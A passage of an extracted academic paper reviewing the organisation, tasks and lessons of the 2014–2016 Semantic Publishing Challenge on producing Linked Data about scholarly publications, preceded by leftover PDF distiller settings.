true /CreateJobTicket false /DefaultRenderingIntent /Default /DetectBlends true /DetectCurves 0.0000 /ColorConversionStrategy /LeaveColorUnchanged /DoThumbnails false /EmbedAllFonts true /EmbedOpenType false /ParseICCProfilesInComments true /EmbedJobOptions true /DSCReportingLevel 0 /EmitDSCWarnings false /EndPage -1 /ImageMemory 1048576 /LockDistillerParams false /MaxSubsetPct 100 /Optimize true /OPM 1 /ParseDSCComments true /ParseDSCCommentsForDocInfo true /PreserveCopyPage true /PreserveDICMYKValues true /PreserveEPSInfo true /PreserveFlatness true /PreserveHalftoneInfo false /PreserveOPIComments false /PreserveOverprintSettings true /StartPage 1 /SubsetFonts true /TransferFunctionInfo /Apply /UCRandBGInfo /Preserve /UsePrologue false /ColorSettingsFile (None) /AlwaysEmbed [ true ] /NeverEmbed [ true ] /AntiAliasColorImages false /CropColorImages true /ColorImageMinResolution 300 /ColorImageMinResolutionPolicy /OK /DownsampleColorImages false /ColorImageDownsampleType /Average /ColorImageResolution 300 /ColorImageDepth 8 /ColorImageMinDownsampleDepth 1 /ColorImageDownsampleThreshold 1.50000 /EncodeColorImages true /ColorImageFilter /FlateEncode /AutoFilterColorImages false /ColorImageAutoFilterStrategy /JPEG /ColorACSImageDict << /QFactor 0.15 /HSamples [1 1 1 1] /VSamples [1 1 1 1] >> /ColorImageDict << /QFactor 0.15 /HSamples [1 1 1 1] /VSamples [1 1 1 1] >> /JPEG2000ColorACSImageDict << /TileWidth 256 /TileHeight 256 /Quality 30 >> /JPEG2000ColorImageDict << /TileWidth 256 /TileHeight 256 /Quality 30 >> /AntiAliasGrayImages false /CropGrayImages true /GrayImageMinResolution 300 /GrayImageMinResolutionPolicy /OK /DownsampleGrayImages false /GrayImageDownsampleType /Average /GrayImageResolution 300 /GrayImageDepth 8 /GrayImageMinDownsampleDepth 2 /GrayImageDownsampleThreshold 1.50000 /EncodeGrayImages true /GrayImageFilter /FlateEncode /AutoFilterGrayImages false /GrayImageAutoFilterStrategy /JPEG /GrayACSImageDict << /QFactor 0.15 /HSamples [1 1 1 1] /VSamples [1 1 1 1] >> /GrayImageDict << /QFactor 0.15 /HSamples [1 1 1 1] /VSamples [1 1 1 1] >> /JPEG2000GrayACSImageDict << /TileWidth 256 /TileHeight 256 /Quality 30 >> /JPEG2000GrayImageDict << /TileWidth 256 /TileHeight 256 /Quality 30 >> /AntiAliasMonoImages false /CropMonoImages true /MonoImageMinResolution 1200 /MonoImageMinResolutionPolicy /OK /DownsampleMonoImages false /MonoImageDownsampleType /Average /MonoImageResolution 1200 /MonoImageDepth -1 /MonoImageDownsampleThreshold 1.50000 /EncodeMonoImages true /MonoImageFilter /CCITTFaxEncode /MonoImageDict << /K -1 >> /AllowPSXObjects false /CheckCompliance [ /None ] /PDFX1aCheck false /PDFX3Check false /PDFXCompliantPDFOnly false /PDFXNoTrimBoxError true /PDFXTrimBoxToMediaBoxOffset [ 0.00000 0.00000 0.00000 0.00000 ] /PDFXSetBleedBoxToMediaBox true /PDFXBleedBoxToTrimBoxOffset [ 0.00000 0.00000 0.00000 0.00000 ] /PDFXOutputIntentProfile (None) /PDFXOutputConditionIdentifier () /PDFXOutputCondition () /PDFXRegistryName () /PDFXTrapped /False /CreateJDFFile false /Description << /CHS /CHT /DAN /DEU /ESP /FRA /ITA /JPN /KOR /NLD (Gebruik deze instellingen om Adobe PDF-documenten te maken voor kwaliteitsafdrukken op desktopprinters en proofers. De gemaakte PDF-documenten kunnen worden geopend met Acrobat en Adobe Reader 5.0 en hoger.) /NOR /PTB /SUO /SVE /ENU (Use these settings to create Adobe PDF documents for quality printing on desktop printers and proofers. Created PDF documents can be opened with Acrobat and Adobe Reader 5.0 and later.) >> /Namespace [ (Adobe) (Common) (1.0) ] /OtherNamespaces [ << /AsReaderSpreads false /CropImagesToFrames true /ErrorControl /WarnAndContinue /FlattenerIgnoreSpreadOverrides false /IncludeGuidesGrids false /IncludeNonPrinting false /IncludeSlug false /Namespace [ (Adobe) (InDesign) (4.0) ] /OmitPlacedBitmaps false /OmitPlacedEPS false /OmitPlacedPDF false /SimulateOverprint /Legacy >> << /AddBleedMarks false /AddColorBars false /AddCropMarks false /AddPageInfo false /AddRegMarks false /ConvertColors /NoConversion /DestinationProfileName () /DestinationProfileSelector /NA /Downsample16BitImages true /FlattenerPreset << /PresetSelector /MediumResolution >> /FormElements false /GenerateStructure true /IncludeBookmarks false /IncludeHyperlinks false /IncludeInteractive false /IncludeLayers false /IncludeProfiles true /MultimediaHandling /UseObjectSettings /Namespace [ (Adobe) (CreativeSuite) (2.0) ] /PDFXOutputIntentProfileSelector /NA /PreserveEditing true /UntaggedCMYKHandling /LeaveUntagged /UntaggedRGBHandling /LeaveUntagged /UseDocumentBleed false >> ] >> setdistillerparams << /HWResolution [2400 2400] /PageSize [612.000 792.000] >> setpagedevice work_4abvrmst2vgavg2uywzcd5rmua ---- Submitted 19 July 2016 Accepted 12 December 2016 Published 30 January 2017 Corresponding author Anastasia Dimou, anastasia.dimou@ugent.be Academic editor Ana Maguitman Additional Information and Declarations can be found on page 42 DOI 10.7717/peerj-cs.105 Copyright 2017 Dimou et al. Distributed under Creative Commons CC-BY 4.0 OPEN ACCESS Challenges as enablers for high quality Linked Data: insights from the Semantic Publishing Challenge Anastasia Dimou1,2, Sahar Vahdati3, Angelo Di Iorio4, Christoph Lange3,5, Ruben Verborgh1,2 and Erik Mannens1,2 1 Faculty of Engineering and Architecture, Ghent University, Ghent, Belgium 2 imec, Leuven, Belgium 3 Department of Intelligent Systems, University of Bonn, Bonn, Germany 4 Department of Computer Science and Engineering, University of Bologna, Bologna, Italy 5 Enterprise Information Systems, Fraunhofer IAIS, Sankt Augustin, Germany ABSTRACT While most challenges organized so far in the Semantic Web domain are focused on comparing tools with respect to different criteria such as their features and competencies, or exploiting semantically enriched data, the Semantic Web Evaluation Challenges series, co-located with the ESWC Semantic Web Conference, aims to compare them based on their output, namely the produced dataset. The Semantic Publishing Challenge is one of these challenges. Its goal is to involve participants in extracting data from heterogeneous sources on scholarly publications, and producing Linked Data that can be exploited by the community itself. This paper reviews lessons learned from both (i) the overall organization of the Semantic Publishing Challenge, regarding the definition of the tasks, building the input dataset and forming the evaluation, and (ii) the results produced by the participants, regarding the proposed approaches, the used tools, the preferred vocabularies and the results produced in the three editions of 2014, 2015 and 2016. We compared these lessons to other Semantic Web Evaluation Challenges. In this paper, we (i) distill best practices for organizing such challenges that could be applied to similar events, and (ii) report observations on Linked Data publishing derived from the submitted solutions. We conclude that higher quality may be achieved when Linked Data is produced as a result of a challenge, because the competition becomes an incentive, while solutions become better with respect to Linked Data publishing best practices when they are evaluated against the rules of the challenge. Subjects Data Science, Digital Libraries, Emerging Technologies, World Wide Web and Web Science Keywords Linked Data, Semantic Web, Linked Data publishing, Semantic Publishing, Challenge, Survey INTRODUCTION The Semantic Web aims to extend the human-readable Web by encoding the semantics of resources in a machine-comprehensible and reusable fashion. Over the past years, a growing amount of research on publishing and consuming Linked Data, i.e., data represented and made available in a way that maximizes reusability, has facilitated Semantic Web adoption. However, one of the remaining issues is lack of high quality Linked How to cite this article Dimou et al. (2017), Challenges as enablers for high quality Linked Data: insights from the Semantic Publishing Challenge. PeerJ Comput. Sci. 3:e105; DOI 10.7717/peerj-cs.105 https://peerj.com mailto:anastasia.dimou@ugent.be https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/10.7717/peerj-cs.105 http://creativecommons.org/licenses/by/4.0/ http://creativecommons.org/licenses/by/4.0/ http://dx.doi.org/10.7717/peerj-cs.105 Data. A promising means to foster and accelerate the publication of such high quality Linked Data is the organization of challenges: competitions during which participants complete tasks with innovative solutions that are then ranked in an objective way to determine the winner. A significant number of challenges has been organized so far, including the Semantic Web Challenge (see http://challenge.semanticweb.org/), its Big Data Track formerly known as the Billion Triples Challenge, and the LinkedUp Challenge (http://linkedup-challenge.org/), to mention a few of the longest lasting. However, these challenges targeted broad application domains and were more focused on innovative ways of exploiting Semantic Web enabled tools (Linked Data consumption) than on the output actually produced (Linked Data production). Therefore, such challenges enable advancement of Semantic Web technology but overlook the possibility of also advancing Linked Datasets per se. This paper focuses on a series of Challenges in the Semantic Publishing domain. Semantic publishing is defined as ‘‘the enhancement of scholarly publications by the use of modern Web standards to improve interactivity, openness and usability, including the use of ontologies to encode rich semantics in the form of machine-readable RDF metadata’’ by Shotton (2009). The 2014 Semantic Publishing Challenge, was themed ‘‘Assessing the Quality of Scientific Output’’ (Lange & Di Iorio, 2014) (2014 SemPub Challenge, http: //2014.eswc-conferences.org/semantic-publishing-challenge.html), in 2015 we mentioned the techniques more explicitly by appending ‘‘... by Information Extraction and Inter- linking’’ (Di Iorio et al., 2015) (2015 SemPub Challenge, http://2015.eswc-conferences. org/important-dates/call-SemPub), and in 2016 we generalized to ‘‘... in its Ecosystem’’ to emphasize the multiple dimensions of scientific quality and the potential impact of producing Linked Data about it (Dimou et al., 2016) (2016 SemPub Challenge, http: //2016.eswc-conferences.org/assessing-quality-scientific-output-its-ecosystem). According to Miller & Mork (2013), extracting, annotating and sharing scientific data (by which, here, we mean standalone research datasets, data inside documents, as well as metadata about datasets and documents) and then building new research efforts on them, can lead to a data value chain producing value for the scholar and Semantic Web community. On the one hand, the scholar community benefits from a challenge that produces data, as the challenge results in more data and in data of higher quality being available to the community to exploit. On the other hand, the Semantic Web community benefits: participants optimize their tools towards performance in this particular challenge, but such optimisations may also improve the tools in general. Once such tools are reused, any other dataset benefits from their advancements, because the processes producing them has been improved. However, bootstrapping and enabling such value chains is not easy. In a recent publication (Vahdati et al., 2016), we discussed lessons we learned from our experience in organizing the first two editions of the Semantic Publishing Challenge— mainly from the perspective of how to improve the organization of further editions and of providing a better service to the scholar community. The lessons are related to the challenge organization, namely defining the tasks, building the input datasets and performing the Dimou et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.105 2/47 https://peerj.com http://challenge.semanticweb.org/ http://linkedup-challenge.org/ http://2014.eswc-conferences.org/semantic-publishing-challenge.html http://2014.eswc-conferences.org/semantic-publishing-challenge.html http://2015.eswc-conferences.org/important-dates/call-SemPub http://2015.eswc-conferences.org/important-dates/call-SemPub http://2016.eswc-conferences.org/assessing-quality-scientific-output-its-ecosystem http://2016.eswc-conferences.org/assessing-quality-scientific-output-its-ecosystem http://dx.doi.org/10.7717/peerj-cs.105 evaluation, as well as lessons we learned by studying the solutions, with respect to the methodologies, tools and ontologies used, and data produced by the participants. We organized the third edition based on these lessons learned. In this paper, we revise our lessons learned, taking into consideration experience gained by organizing the challenge’s third edition, whose results validate in principle our lessons learned. We argue that challenges may act as enablers for the generation of higher quality Linked Data, because of the competitive aspect. However, organizing a successful challenge is not an easy task. Therefore, the goal of this paper is to distill generic best practices, which could be applied to similar events, rendering the challenge tasks into meaningful milestones for efficient Linked Data generation and publishing. To achieve that, we validated the generalizability of our lessons learned against the other Semantic Web Evaluation Challenges (2014 Semantic Web Evaluation Challenges, http: //2014.eswc-conferences.org/important-dates/call-challenges.html, 2015 Semantic Web Evaluation Challenges, http://2015.eswc-conferences.org/call-challenges, 2016 Semantic Web Evaluation Challenges, http://2016.eswc-conferences.org/call-challenges). We concluded that our lessons learned are applicable to other challenges too; thus they can be considered best practices for organizing a challenge. Other challenge organizers may benefit from relying on these best practices when organizing their own challenge. Additionally, we thoroughly analyze and report best practices followed by the Linked Data that the solutions to our challenge’s tasks produce. Our study of the different solutions provides insights regarding different approaches that address the same task, namely it acts as if the challenge benchmarks those different solutions against a common problem. Last, we assess based on the produced datasets how the challenge organization reinforces increasing Linked Data quality in respect to the different Linked Data dimensions identified by Zaveri et al. (2016). Thus, besides the scholarly community and the CEUR-WS.org open access repository, which is the owner of the underlying data, the broader Linked Data community may benefit from looking into our cumulative results. Other Linked Data owners may find details on different approaches dealing with the same problem and the corresponding results they produce. Taking them into consideration, they can determine their own approach for an equivalent case or even consider launching a corresponding challenge to determine the best performing tool with respect to the desired results and consider this one for their regular long term use. Moreover, other Linked Data publishers may advise the results or consider the best practices as their guidelines for improving their tools and thus their results. In summary, our contributions are: • an outline of challenges organized in the field of Linked Data and Semantic Web technologies, • an exhaustive analysis of all solutions to every task of all editions of the Semantic Publishing Challenge series, • a systematic discussion of lessons that we have learned from organizing the Semantic Publishing Challenge, and • a structured set of best practices for organizing similar challenges, resulting from validating our lessons against other Semantic Web Evaluation Challenges. Dimou et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.105 3/47 https://peerj.com http://2014.eswc-conferences.org/important-dates/call-challenges.html http://2014.eswc-conferences.org/important-dates/call-challenges.html http://2015.eswc-conferences.org/call-challenges http://2016.eswc-conferences.org/call-challenges http://dx.doi.org/10.7717/peerj-cs.105 The remainder of the paper is structured as follows: ‘Background and Related Work’ section reviews related work; in particular it sets the background for our study by recapitulating the Semantic Publishing Challenges run so far and comparing them to related challenges. ‘Best Practices for Challenge Organization’ section revisits the lessons learned, taking into consideration all three editions, validates them against other challenges and concludes in best practices for organizing such challenges. ‘Challenge Solutions Analysis’ section exhaustively and cumulatively analyses the solutions submitted to all tasks of all challenges in the series. ‘Discussion: Challenge Impact on Linked Data Quality’ section reviews the Semantic Publishing Challenges as a means of assessing the quality of data, and ‘Conclusions’ section summarizes our conclusions. BACKGROUND AND RELATED WORK This section sets the background of the Semantic Publishing Challenges so far. ‘State of the art on previously organized challenges’ section summarizes other challenges, mainly those run in the Semantic Web community. Then, ‘Semantic Publishing Challenge: 2014–2016’ section recapitulates the Semantic Publishing Challenges run so far, including the definitions of their tasks, and their outcomes. State of the art on previously organized challenges Several related challenges were organized in the past for different purposes and application domains. In this section, we summarize the most well-known, long-lasting and closely related challenges in the Semantic Web field. Where applicable, we report on systematic reviews of challenges for lessons learned. Ontology matching challenges The Ontology Matching Challenges (http://ontologymatching.org/) have been organized since 2004 by the Ontology Alignment Evaluation Initiative (OAEI, http://oaei. ontologymatching.org/) and co-located with several top Information Systems and Web conferences such as WWW (World Wide Web Conferences, https://en.wikipedia.org/ wiki/International_World_Wide_Web_Conference) or VLDB (Very Large Databases Conferences, https://en.wikipedia.org/wiki/VLDB). It aims to forge a consensus for evaluating the different emerging methods for schema or ontology matching. The OAEI aims to assess the strengths and weaknesses of alignment/matching systems, compare the performance of techniques, and improve evaluation techniques to help improving the work on ontology alignment/matching through evaluating the techniques’ performances. Following a similar structure as the Semantic Publishing Challenge, the OAEI challenge provides a list of test ontologies as training datasets. The SEALS infrastructure (http: //oaei.ontologymatching.org/2016/seals-eval.html) to evaluate the results has been made available since 2011. The results are presented during the Ontology Matching workshop, which is usually co-located with the International Semantic Web Conference (ISWC, http://swsa.semanticweb.org/content/international-semantic-web-conference-iswc). The tests and results of the challenge are published for further analysis. Dimou et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.105 4/47 https://peerj.com http://ontologymatching.org/ http://oaei.ontologymatching.org/ http://oaei.ontologymatching.org/ https://en.wikipedia.org/wiki/International_World_Wide_Web_Conference https://en.wikipedia.org/wiki/International_World_Wide_Web_Conference https://en.wikipedia.org/wiki/VLDB http://oaei.ontologymatching.org/2016/seals-eval.html http://oaei.ontologymatching.org/2016/seals-eval.html http://swsa.semanticweb.org/content/international-semantic-web-conference-iswc http://dx.doi.org/10.7717/peerj-cs.105 Semantic Web Challenge The Semantic Web Challenge (http://challenge.semanticweb.org/) aims to apply Semantic Web techniques in building online end-user applications that integrate, combine and deduce information needed to assist users in performing tasks. It features a track about Big Data designed to demonstrate approaches which can work on Web scale using realistic Web-quality data. The Big Data Track, formerly known as the Billion Triples Challenge (BTC), started from 2008 mostly co-located with ISWC. The Billion Triples Challenge aimed to demonstrate the capability of Semantic Web technologies to process very large and messy data as typically found on the Web. The track was renamed to ‘‘Big Data Track’’ because very large data sets are now ubiquitous and the competition was opened to broader range of researchers dealing with their own big data. The functionality of submitted solutions is open but, to address real scalability issues, it forces all participants to use a specific Billion Triple Challenge Dataset provided by the challenge’s organizers. Question Answering over Linked Data (QALD) The Question Answering over Linked Data (QALD) challenge (http://qald.sebastianwalter. org/) (Lopez et al., 2013; Unger et al., 2015) focuses on answering natural language or keyword-based questions over linked datasets. Co-located with the ESWC Semantic Web Conference (ESWC, http://eswc-conferences.org/) in its first two editions in 2011 and 2013, it moved to the Conference and Labs of the Evaluation Forum (CLEF, https://en.wikipedia.org/wiki/Conference_and_Labs_of_the_Evaluation_Forum) for the three following editions, to return to ESWC as a part of its Semantic Web Evaluation Challenges track explained below. In all editions, a set of up to 340 questions over DBpedia (https://dbpedia.org) served as input; participants were expected to answer these questions. The 2013–2016 editions had a task on multilingual questions, while from 2014, a task on hybrid question answering over RDF and free text was added. Some editions considered alternative datasets, e.g., about drugs or music, and had alternative sub-tasks on answering questions over interlinked datasets or finding lexicalizations of ontological terms. Only few submitted solutions address the question/answering issues over a distributed and large collection of interconnected datasets. The first two editions of the QALD Challenge were reviewed (Lopez et al., 2013); similarly to our work, this review ‘‘discuss[es] how the second evaluation addressed some of the issues and limitations which arose from the first one, as well as the open issues to be addressed in future competitions’’. Like us, Lopez et al. present the definition of the QALD challenge’s tasks and the datasets used, and draw conclusions for the subsequent evaluation of question answering systems from reviewing concrete results of the first two challenge editions. Their review of related work includes a review of methods for evaluating question answering systems, whereas the Semantic Publishing Challenge was created to address the lack of such methods for evaluating semantic publishing tools (cf. ‘Semantic Publishing Challenge: 2014–2016’). We additionally present lessons learned for challenge organization (‘Best Practices for Challenge Organization’) and about semantic publishing tools (‘Challenge Solutions Analysis’), which, together, constitute the main contribution of this paper. Dimou et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.105 5/47 https://peerj.com http://challenge.semanticweb.org/ http://qald.sebastianwalter.org/ http://qald.sebastianwalter.org/ http://eswc-conferences.org/ https://en.wikipedia.org/wiki/Conference_and_Labs_of_the_Evaluation_Forum https://dbpedia.org http://dx.doi.org/10.7717/peerj-cs.105 LAK Challenges The Learning Analytics and Knowledge Challenges (LAK Challenges; see http://meco.l3s. uni-hannover.de:9080/wp2/?page_id=18) use a specific dataset of structured metadata from research publications in the field of learning analytics. The challenge was organized in 2011 for the first time and has so far continued yearly with the LAK conference. Beyond merely publishing the data, the LAK challenges encourage its innovative use and exploitation. Participants submit a meaningful use case of the dataset in the scope of six topic categories, such as comparison of the LAK and EDM (Educational Data Mining) communities, innovative applications to explore, navigate and visualize, enrichment of the Dataset, and usage of the dataset in recommender systems. Considering that a lot of information is still available only in textual form, the submitted approaches can not only deal with the specific character of structured data. The aim for further challenges is to combine solutions for processing both structured and unstructured information from distributed datasets. LinkedUp The LinkedUp challenge was run by the LinkedUp project (Linking Data for Education, http: //linkedup-project.eu/) since 2014. The main purpose of the project was to push educational organizations to make their data publicly available on the Web. One of the activities towards this purpose was to organize the LinkedUp Challenge. The three editions of the challenge focused on three different levels of maturity: demo prototypes and applications, innovative tools and applications, and mature data-driven applications. Participants were asked to submit demos of tools that analyze and/or integrate open Web data for educational purposes. For all the above challenges, the participants were asked to submit a scientific paper along with their tool and dataset. D’Aquin et al. (2014) present lessons learned from the LinkedUp project (Linking Web Data for Education). However, their paper provides a summary of the outcomes of the project, including a summary of the LinkedUp Challenge, rather than a systematically structured account of lessons learned. Dialog State Tracking Challenge (DSTC) The challenge series review that is most closely related to ours in its methodology has been carried out by Williams, Raux & Henderson (2016) over a challenge series from a field of computer science that is related to semantics but not to the Web: the Dialog State Tracking Challenge (DSTC, http://workshop.colips.org/dstc5/) on ‘‘correctly inferring the state of [a] conversation [...] given all of the dialog history’’. Like our review, the one of DSTC is based on three editions of a challenge, each of which built on its predecessor’s results, and it presents the definition of the challenge’s tasks and the datasets used. Like we do in ‘Challenge Solutions Analysis’ section, they provide a structured overview of the submissions to the DSTC challenges. However, the focus of their review is on the evolution of tools in their domain of dialog state tracking, whereas our review additionally covers lessons learned for challenge design (cf. ‘Best Practices for Challenge Organization’), besides tools in the domain of Semantic publishing. Dimou et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.105 6/47 https://peerj.com http://meco.l3s.uni-hannover.de:9080/wp2/?page_id=18 http://meco.l3s.uni-hannover.de:9080/wp2/?page_id=18 http://linkedup-project.eu/ http://linkedup-project.eu/ http://workshop.colips.org/dstc5/ http://dx.doi.org/10.7717/peerj-cs.105 Table 1 Semantic Web Evaluation Challenges. Abbreviation Challenge Years SemPub Semantic Publishing Challenge 2014, 2015, 2016 CLSA (Concept-Level) Sentiment Analysis Challenge 2014, 2015, 2016 RecSys Linked Open Data-Enabled Recommender System Challenge 2014, 2015 OKE Open Knowledge Extraction Challenge 2015, 2016 SAQ Schema-agnostic Queries over Linked Data 2015 QALD Open Challenge on Question Answering over Linked Data 2016 Top-K Top-K Shortest Path in Large Typed RDF Graphs Challenge 2016 Other related works There are further related works and challenges that we consider out of the scope, as they are not focused on Linked Data sets. For example, the AI Mashup Challenge (http://aimashup.org/) as a part of the ESWC conference focused on innovative mashups, i.e., web applications combining multiple services and datasets, that were evaluated by a jury. Information Retrieval campaigns are a series of comparative evaluation methods that originate from the 1960s and are used to compare various retrieval strategies or systems. As an example of such campaigns SemEval (Semantic Evaluation) (SemEval campaigns, http: //alt.qcri.org/semeval2016/) is one of the ongoing series of evaluations of computational semantic analysis systems with a focus on Textual Similarity and Question Answering and Sentiment Analysis (Clough & Sanderson (2013)). The Computational Linguistics Scientific Document Summarization Shared Task (CL-SciSumm) (http://wing.comp.nus.edu.sg/cl- scisumm2016/) is based on a corpus of annotated documents; tasks focus on correctly identifying the underlying text that a summary refers to, but also on generating summaries. Semantic Web Evaluation Challenges The Semantic Web Evaluation Challenges, including our Semantic Publishing Challenge, aim at developing a set of common benchmarks and establish evaluation procedures, tasks and datasets in the Semantic Web field. They are organized as an official track of the ESWC Semantic Web Conference, which introduces common standards for its challenges, e.g., common deadlines for publishing the training and evaluation datasets. The purpose of the challenges is to showcase methods and tools on tasks common to the Semantic Web and adjacent disciplines, in a controlled setting involving rigorous evaluation. Each Semantic Web Evaluation Challenge is briefly described here and all of them are summarized at Table 1. Concept-Level Sentiment Analysis Challenge. The Concept-Level Sentiment Analysis Challenge (CLSA) focuses on semantics as a key factor for detecting the sentiment of a text, rather than just performing a lexical analysis of text; cf. Reforgiato Recupero & Cambria (2014) and Reforgiato Recupero, Dragoni & Presutti (2015). Participants are asked to use Semantic Web technology to improve their sentiment analysis system and to measure the performance of the system (http://alt.qcri.org/semeval2015/task12/) within the Sentiment Dimou et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.105 7/47 https://peerj.com http://aimashup.org/ http://alt.qcri.org/semeval2016/ http://alt.qcri.org/semeval2016/ http://wing.comp.nus.edu.sg/cl-scisumm2016/ http://wing.comp.nus.edu.sg/cl-scisumm2016/ http://alt.qcri.org/semeval2015/task12/ http://dx.doi.org/10.7717/peerj-cs.105 Analysis track of the SEMEVAL 2015 workshop, (http://alt.qcri.org/semeval2015/). An automatic evaluation tool (ESWC-CLSA 2015, https://github.com/diegoref/ESWC-CLSA) was applied to the submissions; it was made available to the participants before their submission. In the second edition, participants were asked to submit a concept-level sentiment analysis engine that exploited linked datasets such as DBpedia. Linked Open Data-Enabled Recommender Systems Challenge. The Linked Open Data- Enabled Recommender Systems Challenge (Di Noia, Cantador & Ostuni, 2014) was designed with two main goals: (i) establish links between the two communities of recommender systems and Semantic Web, and (ii) develop content-based recommendation systems using interlinking and other Semantic Web and Technologies. The first edition featured three independent tasks related to a book recommendation use case. While the first edition was successful, the second edition was canceled because it had no participants. Open Knowledge Extraction Challenge. The Open Knowledge Extraction Challenge (OKE) focuses on content extraction from textual data using Linked Data technology (Nuzzolese et al., 2015). The challenge was divided into two sub-tasks (OKE Challenge 2016, https://github.com/anuzzolese/oke-challenge-2016#tasks-overview) focusing on entity recognition and entity typing. The participants of the challenge were the developers of four different well-known systems in this community. The three defined tasks were focused on (a) entity recognition, linking and typing for knowledge base population, (b) entity typing for vocabulary and knowledge base enrichment and (c) Web-scale knowledge extraction by exploiting structured annotation. The submissions were evaluated using two different methods: (i) using datasets for training purposes and for evaluating the performance of the submitted approaches, and (ii) establishing an evaluation framework to measure the accuracy of the systems. The applications of task 1 and 2 were published as web services with input/output provided in the NLP Interchange Format NIF (http://persistence.uni-leipzig.org/nlp2rdf/). Schema-Agnostic Queries over Linked Data Challenge. The Schema-Agnostic Queries over Linked Data Challenge (SAQ) was designed to invite schema-agnostic query approaches and systems (Freitas & Unger, 2015). The goal of this challenge is to improve querying approaches over complex databases with large schemata and to relieve users from the need to understand the database schema. Tasks were defined for two types of queries: schema- agnostic SPARQL queries and schema-agnostic keyword-based queries. Participants were asked to submit the results together with their approach without changing the query syntax but with different vocabularies and structural changes. A gold standard dataset was used to measure precision, recall and F1-score. Semantic Publishing Challenge: 2014–2016 In this section, we briefly summarize the history of the Semantic Publishing Challenge to provide the necessary background for the following discussion. More detailed reports for each edition have been published separately by Lange & Di Iorio (2014), Di Iorio et al. (2015) and Dimou et al. (2016). Dimou et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.105 8/47 https://peerj.com http://alt.qcri.org/semeval2015/ https://github.com/diegoref/ESWC-CLSA https://github.com/anuzzolese/oke-challenge-2016#tasks-overview http://persistence.uni-leipzig.org/nlp2rdf/ http://dx.doi.org/10.7717/peerj-cs.105 We sought a way to challenge the semantic publishing community to accomplish tasks whose results could be compared in an objective way. After some preliminary discussion, we focused on information extraction tasks. The basic idea was to provide as input some scholarly papers—in multiple formats—and some queries in natural language. Participants were asked to extract data from these papers and to publish them as an RDF dataset that could be used to answer the input queries. The best performing approach was identified automatically by comparing the output of the queries in the produced datasets against a gold standard, and by measuring precision and recall. Our selection of queries was motivated by quality assessment scenarios complementary to the traditional metrics based on counting citations: how can the extracted information serve as indicators for the quality of scientific output such as publications or events. The same motivation, structure and evaluation procedure have been maintained in the following years, with some improvements and extensions. All challenge’s series’ tasks (see ‘Tasks evolution’ section), the input to the tasks, namely the training and evaluation datasets (see ‘Input: training and evaluation datasets’ section), the output, namely the submitted solutions and the produced dataset (see ‘Output: solutions and datasets produced’ section) and how their evaluation was conducted (see ‘Tasks evaluation’ section) are briefly explained below. Tasks evolution Table 2 summarizes the tasks’ full history. For each year and each task, we highlight the data source and the format of the input files, along with a short description of the task and a summary on the participation. 2014 edition tasks. The first edition had two main tasks (Task 1 and Task 2) and an open task (Task 3; see Lange & Di Iorio (2014) for full details and statistics of this challenge’s edition). For Task 1, the participants were asked to extract information from selected CEUR- WS.org workshop proceedings volumes to enable the computation of indicators for the workshops’ quality assessment. The input files were HTML tables of content using different levels of semantic markup, as well as PDF full text. The participants were asked to answer twenty queries. For Task 2, the input dataset included XML-encoded research papers, derived from the PubMedCentral and Pensoft Open Access archives. The participants were asked to extract data about citations to assess the value of articles, for instance by considering citations’ position in the paper, their co-location with other citations, or their purpose. In total, they were asked to answer ten queries. Dataset and queries were completely disjoint from Task 1. After circulating the call for submissions, we received feedback from the community that mere information extraction, even if motivated by a quality assessment use case, was not the most exciting task related to the future of scholarly publishing, as it assumed a traditional publishing model. Therefore, to address the challenge’s primary target, i.e., ‘publishing’ rather than just ‘metadata extraction’, we widened the scope by adding an open task (Task 3). Participants were asked to showcase data-driven applications that would eventually support publishing. We received a good number of submissions; winners were selected by a jury. Dimou et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.105 9/47 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.105 1On a more pragmatic level, a further reason was that one of the challenge organizers, Christoph Lange, has been technical editor of CEUR-WS.org since 2013 and thus has (i) the mandate to advance this publication service technically, and (ii) a deep understanding of the data. Table 2 Semantic Publishing Challenge evolution from 2014 to 2016. 2014 edition 2015 edition 2016 edition Task 1 Task Extracting data on workshops history and participants Extracting data on workshops history and participants Extracting data on workshops history and participants Source CEUR-WS.org proceedings volumes CEUR-WS.org proceedings volumes CEUR-WS.org proceedings volumes Format HTML and PDF HTML HTML Solutions 3 4 0 Awards best performance innovation best performance innovation – Decision – chairs’ assessment chairs’ assessment Task 2 Task Extracting data on citations Extracting data on citations, affiliations, fundings Extracting data on internal structure, affiliations, fundings Source PubMed CEUR-WS.org CEUR-WS.org Format XML PDF PDF Solutions 1 6 5 Awards – best performance most innovative best performance most innovative Decision – chairs’ assessment chairs’ assessment Task 3 Task Open task: showcasing semantic publishing applications Interlinking cross-dataset entities Interlinking cross-dataset entities cross-task entities Source – CEUR-WS.org, Colinda DBLP, Springer LD Lancet, SWDF CEUR-WS.org, Colinda DBLP, Springer LD Format – RDF RDF Solutions 4 0 0 Awards Most innovative (jury assessment) – – 2015 edition tasks. In 2015 we were asked to include only tasks that could be evaluated in a fully objective manner, and thus we discarded the 2014’s edition open task (Task 3). While Task 1 queries remained largely stable from 2014 to 2015, the queries for Task 2 changed. We transformed Task 2 into a PDF mining task, instead of XML, and thus moved all PDF-related queries there. The rationale was to differentiate tasks on the basis of the competencies and tools required to solve them. Since the input format was completely new and we expected different teams to participate (as actually happened), we wanted to explore new areas and potentially interesting information. In fact, we asked participants to extract data not only on citations but also on affiliations and fundings. The number of queries remained unchanged (ten in total). We also decided to use the same data source for both tasks, and to make them interplay. CEUR-WS.org data has become the central focus of the whole challenge, for two reasons: on the one hand, the data provider (CEUR-WS.org) takes advantage of a broader community that builds on its data, which, before the Semantic Publishing Challenges, had not been available as Linked Data1. On the other hand, data consumers gain the opportunity to assess the quality of scientific venues by taking a deeper look into their history, as well as the quality of the publications. In 2015, we also introduced a new Task 3. Instead of being an open task, Task 3 was focused on interlinking the dataset produced by the winners of Task 1 from the 2014 edition of the Semantic Publishing Challenge with related datasets in the Linked Data Cloud. Dimou et al. (2017), PeerJ Comput. Sci., DOI 